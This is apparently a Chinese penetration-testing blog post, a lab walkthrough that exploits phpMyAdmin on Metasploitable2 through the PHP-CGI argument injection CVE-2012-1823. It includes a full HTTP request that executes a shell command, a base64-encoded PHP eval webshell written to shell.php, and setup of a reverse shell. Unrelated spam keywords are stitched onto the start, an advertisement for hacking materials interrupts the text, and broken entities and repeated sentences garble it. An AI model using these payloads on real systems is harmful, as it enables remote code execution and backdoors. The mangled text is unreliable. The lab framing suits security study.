天津建设信息网站,wordpress 评论 正在提交_请稍后,服务营销的概念,平面设计转行做什么比较好前言
做渗透测试的时候偶然发现#xff0c;phpmyadmin少见的打法#xff0c;以下就用靶场进行演示了。
0x01漏洞发现 环境搭建使用metasploitable2,可在网上搜索下载#xff0c;搭建很简单这里不多说了。 发现phpmyadmin#xff0c;如果这个时候无法登陆#xff0c;且也…前言
做渗透测试的时候偶然发现phpmyadmin少见的打法以下就用靶场进行演示了。
0x01漏洞发现 环境搭建使用metasploitable2,可在网上搜索下载搭建很简单这里不多说了。 发现phpmyadmin如果这个时候无法登陆且也没有前台的漏洞可以继续在这个phpmyadmin目录下做文章。
发现setup 0x02漏洞利用
进行漏洞利用 https://juejin.cn/post/7042901479388086285
POST
/phpMyAdmin/?-dallow_url_include%3d1-dauto_prepend_file%3dphp://input
HTTP/1.1Host: 192.168.48.143Cache-Control: max-age0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept:
text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,\*/\*;q0.8,application/signed-exchange;vb3;q0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q0.9Cookie: phpMyAdminbdbb427ed9c5e8616fe90261adcfb7229d6ca189;
pma_langen-utf-8Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 36\?phppassthru(\id\);die();?\这里利用的是CVE-2012-1823
?-dallow_url_include%3don±dauto_prepend_file%3dphp%3a//input
解码后
?-d allow_url_includeon -d auto_prepend_filephp://input
开启allow_url_include和auto_prepend_file
其中allow_url_include可以远程文件包含auto_prepend_file加载php://input
其中php://input 可以读取http entity body中指定长度的值由Content-Length指定长度
帮助网安学习全套资料S信免费领取 ① 网安学习成长路径思维导图 ② 60网安经典常用工具包 ③ 100SRC分析报告 ④ 150网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集含答案 ⑧ APP客户端安全检测指南安卓IOS
写一句话木马getshell
echo “PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg” | base64 -d shell.php 0x03反弹shell
利用kali现成的
cp /usr/share/webshells/php/php-reverse-shell.php ./1.php
修改这个ip 修改ip 反弹shell成功且无文件生成。
